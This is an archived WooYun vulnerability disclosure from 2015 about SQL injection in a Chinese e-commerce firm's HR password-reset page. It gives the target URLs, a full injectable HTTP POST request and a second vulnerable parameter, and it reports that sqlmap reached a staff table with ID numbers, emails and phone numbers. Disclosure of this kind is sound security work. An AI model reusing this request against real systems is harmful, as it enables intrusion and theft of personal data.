当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099209

漏洞标题:民生电商某业务系统SQL注入

相关厂商:民生电商

漏洞作者: 路人甲

提交时间:2015-03-03 10:40

修复时间:2015-04-17 10:42

公开时间:2015-04-17 10:42

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-03: 细节已通知厂商并且等待厂商处理中
2015-03-03: 厂商已经确认,细节仅向厂商公开
2015-03-13: 细节向核心白帽子及相关领域专家公开
2015-03-23: 细节向普通白帽子公开
2015-04-02: 细节向实习白帽子公开
2015-04-17: 细节向公众公开

简要描述:

我并没有给贵公司提交简历,所以我决定匿名提交。

详细说明:

民生电商e-HR
https://hr.minshengec.cn/hrss/login.jsp
忘记密码

3.jpg


ORA错误,提示目前使用的Oracle数据库。
post 提交内容:

POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: hr.minshengec.cn:443
Proxy-Connection: keep-alive
Content-Length: 582
Pragma: no-cache
Origin: https://hr.minshengec.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: https://hr.minshengec.cn/hrss/ResetPwd.jsp?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: JSESSIONID=0000DnaJYJnM5KUn8YfKWXZjmgv:16sau0unt
__type=updateData&__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<rpc transaction="10" method="resetPwd"><def><dataset type="Custom" id="dsResetPwd"><f name="user"></f></dataset></def><data><rs dataset="dsResetPwd"><r id="10008" state="insert"><n><v>aaaa*</v></n></r></rs></data><vps><p name="__profileKeys">findPwd;9589d8b622333776899b3ff0567f4603</p></vps></rpc>&1404976068948

漏洞证明:

sqlmap验证

sql3.jpg


列出数据库

bb.jpg


某些人员的数据表BD_PSNBASDOC 身份证 邮箱 手机等

4.jpg


另外
https://hr.minshengec.cn/hrss/ref.show.d?refcode=HI000000000000000003
refcode存在SQL注入,请一并修补。

修复方案:

联系厂家,更新补丁。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-03-03 10:54

厂商回复:

多谢您的关注,我们会尽快修复!!

最新状态:

暂无